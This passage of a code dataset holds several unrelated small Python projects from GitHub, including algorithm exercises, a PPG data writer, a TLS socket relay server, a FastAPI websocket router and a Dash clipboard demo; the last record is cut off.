self.explored.append(visited)\n for i in self.graph[visited]:\n if not self.explored:\n print(len(self.path_for_climbing))\n if i not in self.explored:\n self.all_sol(self.explored.copy(), i)\n else:\n if len(self.explored) == self.vertices:\n if self.explored not in self.path_for_climbing and start in self.graph[self.explored[len(self.explored) - 1]]:\n self.explored.append(start)\n self.path_for_climbing.append(self.explored)\n\n def hill_climbing(self):\n start = \"D\"\n self.all_sol( self.explored,start)\n if not len(self.path_for_climbing):\n print(\"No Path.\")\n return\n cost = self.find_actual_path_value(self.path_for_climbing[0])\n self.optimal_path()\n \n def optimal_path(self):\n for i in range(1, len(self.path_for_climbing)):\n current_path = self.find_actual_path_value(self.path_for_climbing[i])\n if current_path < cost:\n cost = current_path\n continue\n else:\n break\n print(f\"Best Cost of Travelling is : {self.path_for_climbing[i-1]}\")\n print(\"The cost of this path is : \", cost)\n\ng = Graph(4)\ng.add_all_edges()\ng.add_values()\ng.hill_climbing()\n","repo_name":"ZuhaaRana/Artficial-Intelligence-Labs","sub_path":"Lab 05/HillClimbing.py","file_name":"HillClimbing.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74575390976","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 13 16:46:46 2023\n\n@author: naftabi\n\"\"\"\n\nimport torch.nn as nn\n\nclass RNN(nn.Module):\n def __init__(self, input_dims, outputdims, hidden_size, num_layers=1):\n super(RNN, self).__init__()\n self.lstm = nn.LSTM(input_size=input_dims, \n hidden_size=hidden_size,\n num_layers=num_layers,\n proj_size=int(hidden_size/2),\n batch_first=True)\n self.linear = nn.Linear(int(hidden_size/2), outputdims) \n \n def forward(self, x):\n x, _ = self.lstm(x)\n return 
self.linear(x)","repo_name":"navidaftabi/rnn_paper","sub_path":"models/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32494330509","text":"\"\"\"\nCLass to save PPG data to a CSV file.\n\"\"\"\nfrom datetime import datetime\nimport io\n\n## Heartrate analysis package\nimport heartpy as hp\nfrom heartpy.exceptions import BadSignalWarning\n\n\nclass PPG_Writer(object):\n \n def __init__(self, csvStr=None):\n # Setup CSV File\n now = datetime.now()\n \n if csvStr is None:\n self.filename = 'ppg_' + now.strftime(\"%Y-%m-%d_%I_%M_%S\")\n else:\n self.filename = csvStr + '_' + now.strftime(\"%Y-%m-%d_%I_%M_%S\")\n \n self.filename = self.filename + \".csv\"\n \n headers = (u'time' + ',' + u'ps_waveform' + ',' + u'ps_bpm' + ',' + u'cam_waveform' + ',' + u'cam_bpm')\n \n with io.open(self.filename, 'w', newline='') as f:\n f.write(headers)\n f.write(u'\\n')\n \n \n def save_to_csv(self, data):\n with io.open(self.filename, \"a\", newline=\"\") as f:\n \n row = str(data['time'][-1]) + \",\" + \\\n str(data['psData'][-1]) + \",\" + str(data['psBPMData'][-1]) + \",\" + \\\n str(data['camData'][-1]) + \",\" + str(data['camBPMData'][-1])\n \n f.write(row)\n f.write(\"\\n\")\n \n \n def get_samplerate(self):\n loaded_times = hp.get_data(self.filename, column_name='time')\n fs = hp.get_samplerate_datetime(loaded_times, '%S.%f')\n return fs\n \n def get_cam_data(self):\n camData = hp.get_data(self.filename, column_name='cam_waveform')\n return camData\n \n def get_time_data(self):\n timeData = hp.get_data(self.filename, column_name='time')\n return timeData\n \n def get_bpm_estimate(self, time_data, cam_data):\n \n fps = hp.get_samplerate_datetime(time_data, '%S.%f')\n \n cam_bpm = 0\n \n filtered_ppg_r = hp.filter_signal(cam_data, \n cutoff = [0.8, 1], \n filtertype = 'bandpass',\n sample_rate = fps, \n order = 4,\n return_top = False)\n try:\n working_data, measures = hp.process(cam_data, fps)\n except BadSignalWarning:\n print(\"Bad signal\")\n else:\n if (measures['bpm'] > 40 and measures['bpm'] < 180):\n cam_bpm = measures['bpm']\n \n \n return filtered_ppg_r, cam_bpm\n ","repo_name":"Josuelmet/PPG_2020","sub_path":"v4/ppg_v4_writer.py","file_name":"ppg_v4_writer.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27538226248","text":"import sys\r\nimport socket\r\nimport ssl\r\nimport threading\r\n \r\n\r\nclass MsgExchange:\r\n def __init__(self): \r\n self.cond = threading.Condition()\r\n self.server_msg_sock = \"\"\r\n self.server_obj_sock = \"\"\r\n\r\n self.global_data = \"\"\r\n self.global_pos = 0\r\n self.recv_hd_lst = []\r\n self.recv_obj_lst = []\r\n\r\n\r\n def NotifyAll(self):\r\n print(\" In NotifyAll()\")\r\n\r\n if self.cond.acquire():\r\n print(\" \", str(self.global_pos) , \" notifying ...\")\r\n self.cond.notifyAll()\r\n self.cond.release()\r\n\r\n\r\n def clientThreadIn(self, conn, pos, nick):\r\n print(\" thread IN, \", nick, pos, \" start\")\r\n while True: \r\n try: \r\n temp = conn.recv(1024)\r\n self.global_pos = pos\r\n self.global_data = temp.decode()\r\n print(\" Thread IN .... 
global_data=\", self.global_data)\r\n\r\n if self.global_data:\r\n self.recv_hd_lst = self.global_data.split('|||')\r\n if self.recv_hd_lst[6] == 'xxxcccxxx':\r\n print(\" Thread IN, read obj run ................\")\r\n\r\n self.recv_obj_lst = self.read_obj_run()\r\n print(\" Thread IN, read obj run ................ done\")\r\n self.NotifyAll()\r\n else:\r\n print(\" Thread IN, global_data is empty\")\r\n except:\r\n self.global_data = \"disconnected\"\r\n self.global_pos = pos\r\n\r\n print(\" thread IN disconnected, \", nick, pos, \" closed\")\r\n self.NotifyAll()\r\n sys.exit()\r\n\r\n\r\n def server_msg_socket_run(self): \r\n try:\r\n host = socket.gethostname()\r\n host_id = socket.gethostbyname(host)\r\n port = 29002\r\n address = (host_id, port)\r\n\r\n self.server_msg_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.server_msg_sock.bind(address)\r\n self.server_msg_sock.listen()\r\n print(\" In server_msg_socket_run(), connect to \", address, \" success\")\r\n except:\r\n print(\" In server_msg_socket_run(), connect to \", address, \" failed\")\r\n\r\n\r\n def server_obj_socket_run(self): \r\n try:\r\n host = socket.gethostname()\r\n host_id = socket.gethostbyname(host)\r\n port = 29003\r\n address = (host_id, port)\r\n\r\n self.server_obj_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.server_obj_sock.bind(address)\r\n self.server_obj_sock.listen()\r\n print(\" In server_obj_socket_run(), connect to \", address, \" success\")\r\n except:\r\n print(\" In server_obj_socket_run(), connect to \", address, \" failed\")\r\n\r\n\r\n def read_obj_run(self): \r\n print(\"\")\r\n print(\" In read_obj_run(), waitng for an obj client connection\")\r\n client_sock, client_addr = self.server_obj_sock.accept()\r\n print(\" In read_obj_run(), get an obj client connection\")\r\n client_file = client_sock.makefile('rb')\r\n recv_obj_lst = []\r\n data = 'empty'\r\n while data and data != '': \r\n data = client_file.read()\r\n recv_obj_lst.append(data)\r\n print(\" In read_obj_run(), read loop\")\r\n client_file.close()\r\n print(\" In read_obj_run(), read file close\")\r\n client_sock.close()\r\n print(\" In read_obj_run(), read socket close\")\r\n print(\"\")\r\n return recv_obj_lst\r\n\r\n\r\n def clientThreadOut(self, conn, pos, nick): \r\n print(\" thread OUT, \", nick, pos, \" start\")\r\n while True: \r\n if self.cond.acquire(): \r\n print(\" thread OUT, \", nick, pos, \" wait ......................\")\r\n print(\"\")\r\n self.cond.wait() # release lock, wait\r\n print(\" thread OUT, \", nick, pos, \" wake up\")\r\n\r\n if self.global_pos != pos: \r\n if self.global_data == \"disconnected\": \r\n continue\r\n\r\n send_msg = self.global_data.encode()\r\n try:\r\n print(\" thread OUT \", self.global_data, \" send to \", nick)\r\n conn.send(send_msg)\r\n print(\" ThreadOut ................. sent\")\r\n\r\n except:\r\n print(\" thread OUT sending failed, global_data=\", self.global_data)\r\n self.cond.release()\r\n sys.exit() # terminate \"OUT\" thread\r\n\r\n if self.recv_hd_lst: \r\n print(\" check if need to send objects, recv_hd_lst=\", self.recv_hd_lst)\r\n\r\n if self.recv_hd_lst[6] == 'xxxcccxxx': \r\n print(\" clientThreadOut(), to send objects\")\r\n self.send_obj_run()\r\n print(\" clientThreadOut(), objects .............. 
sent\")\r\n\r\n self.cond.release()\r\n\r\n elif self.global_data == \"disconnected\": \r\n print(\" thread IN already closed, now close thread OUT, global_data=\", self.global_data)\r\n #conn.shutdown(socket.SHUT_RDWR)\r\n #conn.close()\r\n #del conn\r\n print(\" thread OUT \", nick, pos, \" closed connection socket deleted\")\r\n self.cond.release()\r\n sys.exit() # terminate \"OUT\" thread\r\n\r\n def send_obj_run(self): \r\n print(\" In send_obj_run(), waiting for an obj client connection\")\r\n client_sock, addr = self.server_obj_sock.accept()\r\n client_file = client_sock.makefile('wb')\r\n\r\n for chunk in self.recv_obj_lst: \r\n print(\" In send_obj_run(), write loop\")\r\n client_file.write(chunk)\r\n\r\n client_file.flush()\r\n client_file.close()\r\n print(\" In send_obj_run(), write file close\")\r\n client_sock.close()\r\n print(\" In send_obj_run(), write socket close\")\r\n\r\n \r\ndef main(): \r\n exch = MsgExchange()\r\n exch.server_msg_socket_run() # server side, a socket is created and listening to client connection for message\r\n exch.server_obj_socket_run() # server side, a socket is created and listening to client connection for objects\r\n\r\n threads1 = []\r\n threads2 = []\r\n pos = 0\r\n\r\n while True:\r\n exch.global_pos = pos\r\n print(\"\")\r\n print(\"main(), ............ communication exchange server is running, wait for a msg connect to accept ............\")\r\n print(\"\")\r\n print(\"\")\r\n newsock, addr = exch.server_msg_sock.accept() # newsock: a socket from a client, addr: address on other end\r\n print(\"main(), a new client msg connect\")\r\n \r\n newssl = ssl.wrap_socket(newsock, server_side=True, certfile=\"cert.pem\", keyfile=\"cert.pem\", \r\n ssl_version=ssl.PROTOCOL_TLSv1)\r\n temp = newssl.read()\r\n exch.global_data = temp.decode()\r\n\r\n if temp.decode() != \"\": # 1st data from a client\r\n print(\"main(), global_data=\", exch.global_data)\r\n comm_partner, comm_me, fullname, fname, fsuffix, filetype, obj = exch.global_data.split('|||')\r\n print(\"main(), connected from \", comm_me)\r\n exch.NotifyAll() # wake up to be sent jobs\r\n\r\n try:\r\n newssl.send(temp) # send message back to where it came from\r\n threads1.append(threading.Thread(name=comm_me + \" threadIn\",target=exch.clientThreadIn, \r\n args=(newssl, pos, comm_me)))\r\n threads1[pos].start()\r\n threads2.append(threading.Thread(name=comm_me + \" threadOut\",target=exch.clientThreadOut,\r\n args=(newssl, pos, comm_me)))\r\n threads2[pos].start()\r\n except:\r\n print(\" threads for \", comm_me, \" cannot start\")\r\n pos += 1\r\n s.close()\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n main()\r\n \r\n","repo_name":"yuping3252/Socket_Comm_Server","sub_path":"server20.py","file_name":"server20.py","file_ext":"py","file_size_in_byte":8597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21116833100","text":"import pathlib\nimport fastapi\nfrom fastapi import APIRouter\n\nfrom app.api.routers import instrument, order, auth\nfrom app.core.config import AUTH_COOKIE_NAME\nfrom app.core.security import get_user_by_id\nfrom app.utils import ntpro_server\n\nfrom app.utils.logger import root_logger\n\nhtml = pathlib.Path(\"./app/index.html\").read_text()\nwebsocket_server = ntpro_server.NTProServer()\n\napi_router = APIRouter(prefix=\"/api\")\n\napi_router.include_router(order.router)\napi_router.include_router(auth.router)\napi_router.include_router(instrument.router)\n\n\n@api_router.get(\n \"/\",\n summary=\"Basic GET 
endpoint\",\n description=\"\"\"Returns 'hello world'-like html page\"\"\",\n tags=[\"Main\"]\n)\ndef get_index():\n return fastapi.responses.HTMLResponse(html)\n\n\n@api_router.websocket(\"/ws\")\nasync def connect_to_websocket(websocket: fastapi.WebSocket):\n root_logger.info(\"Client attempting to establish websocket connection\")\n\n cookie = websocket.cookies.get(AUTH_COOKIE_NAME)\n user = await get_user_by_id(cookie)\n\n if not user:\n root_logger.warn(\n \"Unauthorized user tried to connect to WebSocket\"\n )\n raise fastapi.WebSocketException(fastapi.status.HTTP_401_UNAUTHORIZED)\n\n websocket.state.user = user\n await websocket_server.connect(websocket)\n\n try:\n await websocket_server.serve(websocket)\n except fastapi.WebSocketDisconnect:\n websocket_server.disconnect(websocket)\n","repo_name":"wallodya/ntprog_tt","sub_path":"server/app/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"17058424646","text":"'''\r\nCreated on 2015. 2. 7.\r\n\r\n@author: Ingoo\r\n'''\r\n'''\r\nThe Bellman-Ford algorithm for single-source shortest paths in general graphs\r\n\r\nprocedure shortest-paths(G,l,s)\r\nInput : Directed graph G = (V,E);\r\n edge lengths {l : e in E} with no negative cycles;\r\n vertex s in V\r\nOutput : For all vertices u reachable from s, dist(u is set to the distance from s to u\r\n\r\nfor all u in V :\r\n dist(u) = infinite\r\n prev(u) = nil\r\n \r\ndist(s) = 0\r\nrepeat |v|-1 times :\r\n for all e in E :\r\n update(e)\r\n\r\n \r\nprocedure update((u,v) in E)\r\ndist(v) = min{ dist(v), dist(u) + l(u,v)}\r\n\r\n'''\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\n\r\nbf = nx.DiGraph()\r\n\r\ndef bellman_ford(G,s):\r\n for x in G.nodes() :\r\n G.node[x]['distance'] = float(\"inf\")\r\n G.node[x]['prev'] = None\r\n G.node[s]['distance'] = 0\r\n for x in range(G.number_of_nodes()-1) :\r\n for e in G.edges(data=True) :\r\n G.node[e[1]]['distance'] = min(G.node[e[1]]['distance'],G.node[e[0]]['distance']+e[2].get('weight'))\r\n for x in G.nodes(data=True) :\r\n print(x)\r\n \r\n\r\nG = nx.DiGraph()\r\nnodelist = ['s','a','b','c','d','e','f','g']\r\nedgelist = [('s','a',10),('s','g',8),('a','e',2),('b','c',1),\r\n ('c','d',3),('d','e',-1),('e','b',-2),('f','a',-4),\r\n ('f','e',-1),('g','f',1)]\r\nG.add_nodes_from(nodelist)\r\nG.add_weighted_edges_from(edgelist)\r\n\r\nbellman_ford(G,'s')\r\n ","repo_name":"dlsrnsi/Algorithm","sub_path":"Bellman-ford.py","file_name":"Bellman-ford.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18520746381","text":"import sys\r\nimport tkinter as tk\r\nfrom tkinter.filedialog import asksaveasfile, askopenfilename\r\nfrom helper_functions import *\r\nimport os\r\nimport time\r\n\r\n\r\ndef show_exception_and_exit(exc_type, exc_value, tb):\r\n \"\"\"Show error without closing commnad window\"\"\"\r\n import traceback\r\n traceback.print_exception(exc_type, exc_value, tb)\r\n input(\"Press key to exit.\")\r\n sys.exit(-1)\r\n\r\n\r\ndef ask_for_files_location():\r\n def close_window():\r\n tk.Tk().destroy()\r\n window.destroy()\r\n\r\n def ask_path(file_path, file_tuple):\r\n f_path = askopenfilename(filetypes=file_tuple)\r\n file_path.set(f_path)\r\n\r\n window = tk.Tk()\r\n window.title('Upload input files')\r\n window.geometry('1200x400')\r\n\r\n xml_math, xml_scia, case_math, max_bar = 
tk.StringVar(), tk.StringVar(), tk.StringVar(value='N+My'), tk.StringVar(value='10')\r\n\r\n file_paths = [xml_math, xml_scia, case_math, max_bar]\r\n\r\n lbl1 = tk.Label(window, text=\"Paste the directory to mathcad file\")\r\n lbl1.grid(column=0, row=1, sticky=\"W\", padx=20)\r\n txt1 = tk.Entry(window, width=120, textvariable=xml_math)\r\n txt1.grid(column=1, row=1)\r\n button1 = tk.Button(window, text=\"Find path\", command=lambda: ask_path(xml_math, [(\"mathcad compressed files\", '.xmcdz .xmcd')]))\r\n button1.grid(column=2, row=1, sticky=\"W\")\r\n ent1 = tk.OptionMenu(window, case_math, 'N+My', 'N+Mz', 'Vy+Mz', 'Vz+My', 'T')\r\n ent1.grid(row=1, column=4, sticky=\"W\")\r\n\r\n lbl2 = tk.Label(window, text=\"Max numer of bars in layers\")\r\n lbl2.grid(column=0, row=2, sticky=\"W\", padx=20)\r\n txt2 = tk.Entry(window, width=40, textvariable=max_bar)\r\n txt2.grid(column=1, row=2, sticky=\"W\")\r\n\r\n lbl3 = tk.Label(window, text=\"Paste the path to .xml file\")\r\n lbl3.grid(column=0, row=4, sticky=\"W\", padx=20)\r\n txt3 = tk.Entry(window, width=120, textvariable=xml_scia)\r\n txt3.grid(column=1, row=4)\r\n button3 = tk.Button(window, text=\"Find path\", command=lambda: ask_path(xml_scia, [(\"xml files\", '.xml')]))\r\n button3.grid(column=2, row=4, sticky=\"W\")\r\n\r\n button = tk.Button(window, text=\"Save and next\", command=close_window, height=1, width=15)\r\n button.grid(column=0, row=8, sticky=\"W\", padx=20)\r\n\r\n window.mainloop()\r\n return [f.get() for f in file_paths]\r\n\r\n\r\ndef ask_for_table_name(tables):\r\n def close_window():\r\n root.destroy()\r\n\r\n root = tk.Tk()\r\n root.title('Which results to use')\r\n root.geometry('800x300')\r\n\r\n # define variables\r\n table_var = tk.StringVar(root)\r\n\r\n tk.Label(root, text='Table name').grid(row=0, column=0)\r\n ent1 = tk.OptionMenu(root, table_var, *tables)\r\n ent1.grid(row=1, column=0, sticky='NEWS')\r\n\r\n closeButton = tk.Button(root, text='Close and Next', command=close_window)\r\n closeButton.grid(row=2, column=0, sticky='NEWS')\r\n\r\n root.mainloop()\r\n return table_var.get()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sys.excepthook = show_exception_and_exit\r\n\r\n xml_math, xml_scia, case, max_bars = ask_for_files_location()\r\n # print(xml_math, '\\n', xml_scia, '\\n', case)\r\n tables = get_xml_table_names(xml_scia)\r\n table_name = ask_for_table_name(tables)\r\n\r\n print('Analysing mathcad file...')\r\n all_define = get_define_from_mathcad(xml_math)\r\n df = my_xml_parse_to_df(xml_scia, table_name)\r\n df_in, cols = input_df(df, case)\r\n if case == 'N+M':\r\n df_in['n_1'] = 2\r\n df_in['n_2'] = 0\r\n\r\n vars = df_in.columns\r\n # print(vars)\r\n python_str = 'import math\\nimport numpy as np\\nfrom helper_functions import moj_max, moj_min\\nmm = 0.001\\nN = 1\\ncm = 10 *mm\\n' \\\r\n 'kN = 1000 * N\\nMPa = N/mm**2\\nm = 1000 * mm\\nπ = math.pi\\n'\r\n\r\n python_str += '\\ndef calc(df1):\\n\\tdf = df1.copy()\\n'\r\n\r\n for i, elem in enumerate(all_define):\r\n\r\n list_of_commands = []\r\n list_of_commands = make_list_of_lists(elem, list_of_commands)\r\n list_of_equations = make_equ(list_of_commands)\r\n\r\n if list_of_equations[0][0] == 'function':\r\n var = ''\r\n else:\r\n var = list_of_equations[0][0]\r\n\r\n if var in vars:\r\n # python_str += '\\t' + var + ' = ' + 'np.array({})'.format(df_in[var].to_list()) + '\\n'\r\n python_str += '\\t' + var + ' = ' + 'df[\"{}\"].to_numpy()'.format(var) + '\\n'\r\n print(var, len(df_in[var].to_list()))\r\n elif var in cols:\r\n python_str += 
'\\t' + to_python(list_of_equations) + '\\n'\r\n python_str += '\\t' + 'if isinstance({}, np.ndarray) and ({}.size == 1):\\n\\t\\t'.format(var, var) + 'df[\"{}\"] = {}[0]'.format(var, var) + '\\n\\telse: \\n\\t'\r\n python_str += '\\t' + 'df[\"{}\"] = {}'.format(var, var) + '\\n'\r\n else:\r\n python_str += '\\t' + to_python(list_of_equations) + '\\n'\r\n\r\n python_str += '\\treturn df' #+ ','.join(cols)\r\n print('Calculating all results...')\r\n\r\n cur_dir = os.getcwd()\r\n my_file1 = os.path.join(cur_dir, 'my_file.py')\r\n with open(my_file1, 'w', encoding='utf-8') as f:\r\n f.write(python_str)\r\n\r\n sys.path.insert(1, cur_dir)\r\n\r\n from my_file import calc\r\n df_out = calc(df_in)\r\n print(df_out)\r\n if 'Pu' in df_out.columns: # conversion to kN and kNm\r\n # First row with different number of bars\r\n for i in range(3, int(max_bars)+1):\r\n if (df_out['Result'] == 'ok').all():\r\n break\r\n df_out['n_1'] = np.where(df_out['Result'] == 'ok', df_out['n_1'], i)\r\n df_out = calc(df_out)\r\n\r\n # Second row with different number of bars\r\n for i in range(1, int(max_bars)+1):\r\n if (df_out['Result'] == 'ok').all():\r\n break\r\n df_out['n_2'] = np.where(df_out['Result'] == 'ok', df_out['n_2'], i)\r\n df_out = calc(df_out)\r\n\r\n print('conversion to kN and kNm')\r\n df_out['Pu'] = df_out['Pu']/10**3\r\n df_out['Mu'] = df_out['Mu']/10**3\r\n df_out['Md'] = df_out['Md'].astype(float)/10**3\r\n\r\n max_n1 = df_out['n_1'].max()\r\n max_n2 = df_out['n_2'].max()\r\n\r\n df_max = df_out.loc[(df_out['n_1'] == max_n1) & (df_out['n_2'] == max_n2)]\r\n df_max = df_max.sort_values(by=['Mu', 'Pu'], ascending=[False, False])\r\n\r\n df[['N', 'V_y', 'V_z', 'M_x', 'M_y', 'M_z']] = df[['N', 'V_y', 'V_z', 'M_x', 'M_y', 'M_z']].astype('float64') / 1000\r\n df_max = df_max.merge(df.loc[df_max.index], on=['Case', 'Name', 'dx']).drop_duplicates().reset_index()\r\n\r\n else:\r\n idx_max = []\r\n for col in cols:\r\n if not df_out[col].dtypes == 'object' and df_out[col].idxmax() not in idx_max:\r\n idx_max.append(df_out[col].idxmax())\r\n print(idx_max)\r\n df_max = df_out.loc[idx_max]\r\n df[['N', 'V_y', 'V_z', 'M_x', 'M_y', 'M_z']] = df[['N', 'V_y', 'V_z', 'M_x', 'M_y', 'M_z']].astype('float64') / 1000\r\n df_max = df_max.merge(df.loc[idx_max], on=['Case', 'Name', 'dx']).reset_index()\r\n\r\n fout = asksaveasfile(title='Save excel file', mode='w', defaultextension=\".xlsx\")\r\n excel_file = fout.name\r\n print('Saving excel file...')\r\n with pd.ExcelWriter(excel_file, engine='openpyxl') as writer:\r\n df_out.to_excel(writer, sheet_name='all_checks', index=False)\r\n df_max.to_excel(writer, sheet_name='max_columns', index=False)\r\n\r\n int_force_in_mathcad = [col for col in df_in.columns if col not in ['Case', 'Name', 'dx']]\r\n fout = asksaveasfile(title='Save mathcad file', mode='w', defaultextension=\".xmcd\")\r\n mathcad_file = fout.name\r\n print('Saving mathcad file...')\r\n\r\n fill_in_mathcad(xml_math, int_force_in_mathcad, df_max, mathcad_file)\r\n os.remove(my_file1)","repo_name":"kniazmajowiec/mathcad_to_py","sub_path":"simple_case.py","file_name":"simple_case.py","file_ext":"py","file_size_in_byte":7644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2061628829","text":"## @file WinRcPath.py\r\n# Plugin to find Windows SDK Resource Compiler rc.exe\r\n##\r\n# This plugin works in conjuncture with the tools_def to support rc.exe\r\n#\r\n# Copyright (c) Microsoft Corporation\r\n# SPDX-License-Identifier: 
BSD-2-Clause-Patent\r\n##\r\nimport logging\r\nfrom edk2toolext.environment.plugintypes.uefi_build_plugin import IUefiBuildPlugin\r\nimport edk2toollib.windows.locate_tools as locate_tools\r\nfrom edk2toolext.environment import shell_environment\r\nfrom edk2toolext.environment import version_aggregator\r\nfrom pathlib import Path\r\n\r\n# MU_CHANGE Entire File - Perf improvements\r\nclass WinRcPath(IUefiBuildPlugin):\r\n\r\n def do_pre_build(self, thebuilder):\r\n #get the locate tools module\r\n \r\n # Check if the rc.exe path is already cached and still exists\r\n cache_path = Path(thebuilder.ws, \"Conf\", \".rc_path\")\r\n if cache_path.exists():\r\n with open(cache_path, \"r\") as f:\r\n rc_path = Path(f.readline().strip()).absolute()\r\n if (rc_path / \"rc.exe\").exists():\r\n logging.debug(f\"Found rc.exe folder in cache: {rc_path}\")\r\n self._set_path(rc_path)\r\n return 0\r\n\r\n # If it does not exist, try to find it with FindToolInWinSdk\r\n path = locate_tools.FindToolInWinSdk(\"rc.exe\")\r\n if path is None:\r\n logging.critical(\"Failed to find rc.exe\")\r\n return 1\r\n\r\n path = Path(path).absolute().parent\r\n self._set_path(path)\r\n cache_path.unlink(missing_ok=True)\r\n with cache_path.open(\"w\") as f:\r\n f.write(str(path))\r\n return 0\r\n\r\n def _set_path(self, path: Path):\r\n shell_environment.GetEnvironment().set_shell_var(\"WINSDK_PATH_FOR_RC_EXE\", str(path))\r\n version_aggregator.GetVersionAggregator().ReportVersion(\"WINSDK_PATH_FOR_RC_EXE\", str(path), version_aggregator.VersionTypes.INFO)\r\n","repo_name":"microsoft/mu_basecore","sub_path":"BaseTools/Plugin/WindowsResourceCompiler/WinRcPath.py","file_name":"WinRcPath.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":214,"dataset":"github-code","pt":"79"} +{"seq_id":"73401228734","text":"'''\n编写一个数组求和函数void Add(int n, int* a1, int* a2, int* result); 其中n<100是数组长度,a1是第一个数组,a2是第二个数组,result是a1和a2的和。\n假设a1={2, 4, 5, 8}, a2={1, 0, 4, 6},则result={3, 4, 9, 14};\n  编写main函数测试该函数的正确性。依次输入n, a1, a2, 输出result。\n输入:\n4\n2 4 5 8\n1 0 4 6\n\n输出:\n  3 4 9 14\n'''\nn = int(input())\narr1 = [int(i) for i in input().split()]\narr2 = [int(i) for i in input().split()]\nres = []\n\n\ndef summatiion(n, a1, a2):\n for i in range(n):\n res.append(a1[i] + a2[i])\n\n return res\n\n\nans = summatiion(n, arr1, arr2)\nfor i in range(len(ans)):\n if i == len(ans) - 1:\n print(ans[i])\n else:\n print(ans[i], end=' ')","repo_name":"extravert/eduOnline","sub_path":"BBQ/python_base/lanbridge/array/summation.py","file_name":"summation.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42803572752","text":"from django import template\n\nregister = template.Library()\n\n\n@register.filter()\ndef convert_list_by_range(queryset, field_name):\n result = []\n last_date = None\n couple = []\n for obj in queryset:\n if last_date != getattr(obj, field_name).date():\n if len(couple) > 0:\n result.append({'date': last_date, 'items': couple})\n last_date = getattr(obj, field_name).date()\n couple = []\n couple.append(obj)\n if len(couple) > 0:\n result.append({'date': last_date, 'items': couple})\n return result\n","repo_name":"clairkkluhnkkk5720/IMBTNG-WEBAPP","sub_path":"src/apps/core/templatetags/list_converter.py","file_name":"list_converter.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} 
+{"seq_id":"11966808693","text":"\"\"\"\nAdd this to a .js file in the assets folder in the app root directory\n\n\nwindow.dash_clientside = Object.assign({}, window.dash_clientside, {\n clientside: {\n copyToClipboard: function (n, text) {\n if (!navigator.clipboard) {\n alert(\"copy not available, use ctrl-c\");\n return;\n }\n if (n > 0) {\n // removes code block markdown syntax ```\n const trimmed_text = text.replace(/(^```)|(```$)/g, '');\n navigator.clipboard.writeText(trimmed_text).then(function() {\n alert(\"Copied. crl-v to paste\")\n }, function() {\n alert('copy error')\n });\n }\n }\n }\n});\n\"\"\"\n\n\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State, ClientsideFunction\n\nFONT_AWESOME = (\n \"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css\"\n)\nexternal_stylesheets = \"https://codepen.io/chriddyp/pen/bWLwgP.css\"\n\napp = dash.Dash(__name__, external_stylesheets=[FONT_AWESOME, external_stylesheets])\n\n\nsample_code = \"\"\"```\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.express as px\nimport pandas as pd\n\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\nfig = px.scatter(df, x=\"gdp per capita\", y=\"life expectancy\",\n dcc.Graph(\n id='life-exp-vs-gdp',\n figure=fig\n )\n])\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n\n```\"\"\"\n\n\napp.layout = html.Div(\n [\n html.Details(\n [\n html.Summary(\n [\n \"Code sample\",\n html.Button(\n id=\"copy_code\",\n n_clicks=0,\n className=\"fa fa-copy\",\n style={\"margin\": 10},\n ),\n ]\n ),\n dcc.Markdown(id=\"code\", children= sample_code),\n ],\n style={\"borderStyle\": \"solid\", \"borderWidth\": 1,},\n ),\n ]\n)\n\n\napp.clientside_callback(\n ClientsideFunction(namespace=\"clientside\", function_name=\"copyToClipboard\"),\n Output(\"copy_code\", \"children\"), # this function has no output, but Dash requires an Output\n Input(\"copy_code\", \"n_clicks\"), # when the copy button is clicked on:\n State(\"code\", \"children\"), # copies the children of this component to the clipboard\n)\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True)\n","repo_name":"AnnMarieW/dash-quickstart","sub_path":"demo_apps/copy_to_clipboard.py","file_name":"copy_to_clipboard.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"70415890174","text":"# Menentukan transpose matriks\r\n\r\n#Masukkan besar variabel pada kolom dan baris\r\nbaris = int(input(\"Masukkan jumlah baris matriks : \"))\r\nkolom = int(input(\"Masukkan jumlah kolom matriks : \"))\r\n\r\n#lakukan perulangan bertingkat dengan tujuan membentuk matriks awal\r\n\r\nM = [[0 for j in range (kolom)] for i in range (baris)]\r\nfor i in range (baris):\r\n for j in range (kolom):\r\n M [i][j] = int(input(\"Masukkan besar bilangan : \"))\r\n\r\n#mempersiapkan data data matriks sebelum di transpose 